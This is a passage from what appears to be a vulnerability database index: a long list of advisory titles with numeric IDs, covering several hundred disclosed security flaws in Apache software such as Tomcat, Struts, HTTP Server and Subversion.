3949| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
3950| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
3951| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
3952| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
3953| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
3954| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
3955| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
3956| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
3957| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
3958| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
3959| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
3960| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
3961| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
3962| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
3963| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
3964| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
3965| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
3966| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
3967| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
3968| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
3969| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
3970| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
3971| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
3972| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
3973| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
3974| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
3975| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
3976| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
3977| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
3978| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
3979| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
3980| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
3981| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
3982| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
3983| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
3984| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
3985| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
3986| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
3987| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
3988| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
3989| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
3990| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
3991| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
3992| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
3993| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
3994| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
3995| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
3996| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
3997| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
3998| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
3999| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
4000| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
4001| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
4002| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
4003| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
4004| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
4005| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
4006| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
4007| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
4008| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
4009| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
4010| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
| [46953] Apache MPM-ITK Module Security Weakness
| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
| [46166] Apache Tomcat JVM Denial of Service Vulnerability
| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
| [44616] Apache Shiro Directory Traversal Vulnerability
| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
